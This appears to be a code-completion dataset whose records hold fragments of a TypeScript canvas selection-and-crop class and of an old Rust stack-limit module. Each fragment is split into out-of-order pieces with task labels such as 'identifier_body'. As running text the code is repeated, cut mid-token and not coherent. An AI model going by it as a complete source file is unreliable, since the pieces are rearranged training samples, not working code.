var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e); | myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas | // We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx; | random_line_split |
CanvasState.ts | this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e);
// We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx;
myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
| {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop; | identifier_body | |
CanvasState.ts | (canvas) {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e);
// We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx;
myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i]. | constructor | identifier_name | |
stack.rs | .
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn | (limit: uint) {
asm!("movl $$0x48+90*4, %eax
movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq % | target_record_sp_limit | identifier_name |
stack.rs | .
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) | asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $$0x48+90*4, %eax
movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq % | {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile"); | identifier_body |
stack.rs | .
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
